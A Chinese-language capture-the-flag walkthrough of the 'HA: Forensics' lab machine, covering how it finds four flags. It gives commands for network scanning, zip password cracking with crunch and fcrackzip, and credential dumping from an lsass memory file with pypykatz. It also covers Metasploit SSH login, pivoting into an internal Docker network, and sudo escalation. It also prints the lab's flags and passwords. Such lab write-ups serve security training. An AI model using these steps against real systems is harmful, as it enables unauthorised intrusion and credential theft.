HA: Forensics靶机渗透测试
文章目錄
- 靶機說明:
- 一、信息收集
- 1.主機發(fā)現(xiàn)
- 2.端口掃描
- 二、漏洞挖掘
- 1.訪問靶機 web 服務
- 2.使用 dirb 進行目錄掃描
- 3.使用 exiftool 提取數(shù)據(jù)
- 4.使用 dirb 掃描 txt 文件
- 5.PGP解密
- 6.破解密碼
- 7.分析 lsass.DMP 文件
- 三、使用 msfconsole 進行后滲透
- 1.kali 打開 msfconsole ,search ssh/ssh_login
- 2.利用該模塊
- 3.查看當前所有·會話信息
- 4.升級會話
- 5.進入會話并查看網(wǎng)絡連接
- 6.橫向滲透
- 四、磁盤鏡像取證
- 1.打開 kali 自帶工具 autopsy
- 2.火狐訪問 http://localhost:9999/autopsy
- 五、提權
- 1.回到靶機shell,查看所有用戶
- 2.查看可 sudo 執(zhí)行的命令
- 3.直接提權
靶機說明:
哈:法醫(yī)學是實驗室的中級水平,它能讓你在網(wǎng)絡法醫(yī)調(diào)查中親身體驗。這個實驗室完全致力于網(wǎng)絡法醫(yī)調(diào)查的方法和工具,并且有各種技術可以找到的證據(jù)。由于這是一個捕獲旗幟的過程,因此需要注意的是,這不是一個根本性的挑戰(zhàn),而是找到所有旗幟的主要動機。
旗數(shù):4
目標:找到所有4個標志(獲取根不是目標)
一、信息收集
1.主機發(fā)現(xiàn)
arp-scan -l
發(fā)現(xiàn)靶機 ip:192.168.1.201
2.端口掃描
nmap -A -p- 192.168.1.201
發(fā)現(xiàn)靶機開啟了 80 端口,Apache 服務;22 端口,ssh 服務
二、漏洞挖掘
1.訪問靶機 web 服務
發(fā)現(xiàn)一些關于指紋的圖片,點擊右上角 get flag,發(fā)現(xiàn)作者整活,未發(fā)現(xiàn)其他有用信息
2.使用 dirb 進行目錄掃描
dirb http://192.168.1.201
發(fā)現(xiàn) /images/ 目錄,見名知意應該是存放圖片的目錄
訪問該路徑發(fā)現(xiàn)若干圖片,其中有名為 DNA 和 fingerprint(指紋)的可疑圖片,經(jīng)過測試發(fā)現(xiàn) DNA 沒有有用信息
3.使用 exiftool 提取數(shù)據(jù)
apt-get install exiftool #kali并未自帶此工具,使用該命令更改
exiftool fingerprint.jpg
發(fā)現(xiàn) flag1
Flag:1 {bc02d4ffbeeab9f57c5e03de1098ff31}
4.使用 dirb 掃描 txt 文件
dirb http://192.168.1.201 -X .txt
發(fā)現(xiàn)在網(wǎng)站根目錄下有個 tips.txt 文件
訪問該文件(這里我換了網(wǎng)絡環(huán)境,靶機ip為192.168.2.192)
發(fā)現(xiàn)一個路徑一個 zip 壓縮文件
1)訪問 http://192.168.2.192/flag.zip 進行下載 zip 文件,解壓時發(fā)現(xiàn)需要密碼
2)訪問 http://192.168.2.192/igolder 發(fā)現(xiàn)該路徑下有 clue.txt 文件,打開發(fā)現(xiàn) PGP 加密
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG C# v1.6.1.0lQOsBF9sr70BCACvH5Vs2Lp9nyVIbVk4yraUmxDBxPJNitlU/IqcR2d+UDEORbDl
UClLXSqapjBFuu24p86SIcv/1VktRh79lnL5j4uKSAEuI/t6SJW4hlfovVBndUvT
X61w6TRJlLq5AsLOS38PWpIgL1ECIqliwNfCjjlvQd8xm/C9BV1lqM71JYtW34ST
XsKzxomVqGtWvrzs/tFege20z12JtqgPmqGApXzNjI4y7iH0vvVS8nCF58nwyjoH
wbx6EXk002hDe0/W7tsCGhp3gU5wzkUy4kfBfVrLp0/23kA/k4iJvlMPMAeQoJPx
AymXmXEKlp+igBrBicBw68SZgLAQhg8ZO2ybABEBAAH/AwMC/MDF76NvTu1gM8Y7
xjKap2L3OY8xeOoAeMQUueabuTP2rl7jB6YfsEcQj4xDjz0SBXIQxP0PziHpXTk3
v5FlH5nhSWZI6OgN0HF6rdjByKT4CNlkt7IVIPEQc7IidQP5K1/YhbghysyYHyBH
3TRAEwJszcjj6TsAOM1mpLXlPweM1sC3ms8xoFVSipPcHviNcQq58zLpGcWvmmuc
ZfqrRBqfpU/wZEmEvcDW1FOCvq/Bqo1psPOXYfI+ul7C0MLObmzi/u2p7EJLwf2E
tGBJ++wLdProHJHovp0WlQSHFamOWmM5p9SAq7lMegvIn3NHe0ZQS2agjBzNiMW5
LK/dZ0i1lX1SSRNNOlLC+Tf/v6bS8gAD+WSGsYEITPcRP2OpCiCBoa4d7GsK7nyF
RHIngmJrp5g1agayG92ahUFRLqQ7KGa+hu3N8/pM+x/dNH1Uw/jhKHsacpgBBCPf
Zs/NZlcMbCI0TD6CFKe2QCEnOW6iLlOEgV2ptEPJLkinaFZ8BEf5HYHUhW1CqwTZ
otvsmzkijYDvaV77zylVqb9gMJelVNWLZG3fcw+eCGF1wBBxno99xcxEgJpzdOeH
TnU3yQ1JllZb/0jQ7vBq22hrOTYo9iRBe/XOnUj1+J8QVynYLcgvEx8I8/tXnfNM
/bQkwbEohnTzklDWWKrqBXlXOTpBKZL4bk+k0U5wMpOQOkCgiHTMmklmAV/+0S/G
5EDrNNdCDCIdtXtAHJjIUtVivNNyQIgVuImYbhbXcSWziX0IT0QkRGSz8a+/MKl3
0yItTNXi/KpnOt+xfvjavzPscXyKyt7+82feOsl4f/jDFZW6P4NifjWGeP+9Q8FA
MPPZ/xDjhIgBvsqLpGDEuYp7VTVxWWIUtzao7P4WzLQAiQEcBBABAgAGBQJfbK+9
AAoJEF0YY4bPiiBW83YH/jU75ZqnBG3yJGOYa7qapXIPc/Dg6jc1FuivWlphZs8C
PSog9kqEqlY3k5OY03YBMIRgWMI2UyCgiSPcgwF8bGXm8hPQgL0QN5cFX7uubH9S
ofeM+SyRRSpuXtcWgljHe6e/ABR533bwLdk6YyHf4YyCxCDxWZRdI/FyoRYrh7q4
CTfgVJoiem1P9sViva28IBJ+H1ctyioWVEkKz1/PW9NBYy9mTbmVlwdWW1IzXRiS
OcXu0tW1rawJ/z5SwCwjKZxvSm2Hfk9eguEojbfPIoXauNRH00u4tEHO6YjD54ZC
DxpZfSHSCsOWEfOAA5EO+uDGSY4+WB6ihKmCV+i68Jc=
=KoPg
-----END PGP PRIVATE KEY BLOCK----------BEGIN PGP MESSAGE-----
Version: BCPG C# v1.6.1.0hQEMA10YY4bPiiBWAQf8DaEoVUWpzj5+3WMZcOhjfXo6Hk+MKD5TLWy5XndaEXRZ
3+aUQuECr88LG83BzmAS1MITHf7xifx4aiqgeM6bGILlvseP9W2Fmv9E5KOVLUYI
T8V3jINwmNg7FinwuYlT2ld2yU1qMwiEZ8GPTK4U90WSZh+/dYnKTVKxjdEZXlj9
FF42BygUxjJgEDFQi0HhUb7AX+tYQIQV0p5DZcTETZweyM9OBcwuhwzspjKp3Rz9
zFcnnCEZ4+JbdXTcXPD9cTBHJhWk01lclg+XR4v572HilznzWFutqcWrMuhBO0UZ
q0v1MOG03o8MN2VysMgbk8gEdOs+GE8fPBtsKqS5tsmhcwZR3QA/BctqAT+IhYtI
s7j0pd+mTG+zvQu5B41isicBb0yLA80YVlfWjjUmZAAF4oowPKJWY9CQIap39Ked
cbLU2+CI3JJf7JZvcZK4KGeuYgpRXU8Jvu3BHSEu1zCHGgieYRW254OJYZcJYFx6
v+6OPq+UNCBbhAFRjJpkOigA+GgH5lGf0vRYM/gz5vA4MDRrEojFs9DIwATbflqN
QOs=
=Y9OD
-----END PGP MESSAGE-----5.PGP解密
訪問 https://www.igolder.com/PGP/decryption/ 進行在線解密
解密后發(fā)現(xiàn)提示:
如果法醫(yī)忘記了他的密碼,這個提示可以幫助他,其中密碼是6個字符長,開始3個字符是單詞“for”,結束3個字符是數(shù)字
6.破解密碼
1)使用 crunch 或腳本生成密碼本
crunch 6 6 -t for%%% -o dict.txt
2)使用 fcrackzip 利用密碼本破解密碼
fcrackzip -u -D -p dict.txt flag.zip
3)使用密碼解密
unzip flag.zip
for007
解壓后得到 flag.pdf、lsass.DMP 文件
打開 flag.pdf 得到 flag2
Flag:2 {4a3232c59ecda21ac71bebe3b329bf36}
7.分析 lsass.DMP 文件
1)使用 pypykatz 檢查內(nèi)存轉儲文件
pypykatz lsa minidump ./lsass.DMP
發(fā)現(xiàn)兩個明文用戶名和 NTML 加密的密碼,發(fā)現(xiàn)其密碼相同
在網(wǎng)站 https://www.cmd5.com/ 對其進行解密
得到密碼 Password@1
三、使用 msfconsole 進行后滲透
1.kali 打開 msfconsole ,search ssh/ssh_login
msfconsole
msf> search ssh/ssh_login
2.利用該模塊
use 0
show options
set rhosts 192.168.1.111 #靶機IP地址,這里我右換了個網(wǎng)絡QAQ
set username jasoos
set password Password@1
run
3.查看當前所有·會話信息
sessions -l
4.升級會話
sessions -u 1
5.進入會話并查看網(wǎng)絡連接
sessions 2
ifconfig
發(fā)現(xiàn)有多個網(wǎng)絡連接其中有一個內(nèi)部 ip 172.17.0.1,我們不能從外部直接進行訪問考慮使用靶機作為跳板
6.橫向滲透
1)使用 exit 退出當前 meterpreter shell
再次升級 shell
exit
sessions -u 1
2)添加路由
use post/multi/manage/autoroute
set session 3
run
3)探測主機
use post/multi/gather/ping_sweep
set session 3
set rhosts 172.17.0.0/24
run
發(fā)現(xiàn) 127.17.0.1、127.17.0.2
4)端口掃描
use auxiliary/scanner/portscan/tcp
set rhosts 172.17.0.2
set ports 1-1000
run
發(fā)現(xiàn) 21 端口(ftp)開放
5)測試 ftp 是否可匿名登陸
use auxiliary/scanner/ftp/anonymous
set rhosts 172.17.0.2
run
發(fā)現(xiàn)可以匿名登陸
6)進入 ftp,查看文件
sessions 3
shell
python -c "import pty;pty.spawn('/bin/bash')"
ftp 172.17.0.2
anonymous
ls
cd pub
ls
發(fā)現(xiàn)有 saboot.001 文件,使用 get 獲取
get saboot.001
7)使用 python 簡單服務器進行傳輸文件
python -m SimpleHTTPServer 8888
8)kali 獲取文件
wget http://192.168.1.111:8888/saboot.001
9)分析文件
發(fā)現(xiàn)該文件是個磁盤鏡像
四、磁盤鏡像取證
1.打開 kali 自帶工具 autopsy
2.火狐訪問 http://localhost:9999/autopsy
1)新建任務
2)填寫信息
重新訪問該工具服務
加載磁盤鏡像后發(fā)現(xiàn)了 flag3.txt、 creads.txt:
Flag:3 {8442460f48338fe60a9497b8e0e9022f}
amVlbmFsaWlzYWdvb2RnaXJs
發(fā)現(xiàn) creads.txt 中字符疑似 base64 加密,進行解密
得到明文 jeenaliisagoodgirl 疑似用戶密碼
五、提權
1.回到靶機shell,查看所有用戶
發(fā)現(xiàn) forensic 用戶,嘗試使用 ssh 進行連接
ssh forensic@192.168.1.111
yes
jeenaliisagoodgirl
2.查看可 sudo 執(zhí)行的命令
sudo -l
發(fā)現(xiàn)可以執(zhí)行所有命令
3.直接提權
總結
以上是生活随笔為你收集整理的HA: Forensics靶机渗透测试的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: HA: Dhanush靶机渗透测试
- 下一篇: HA: InfinityStones靶机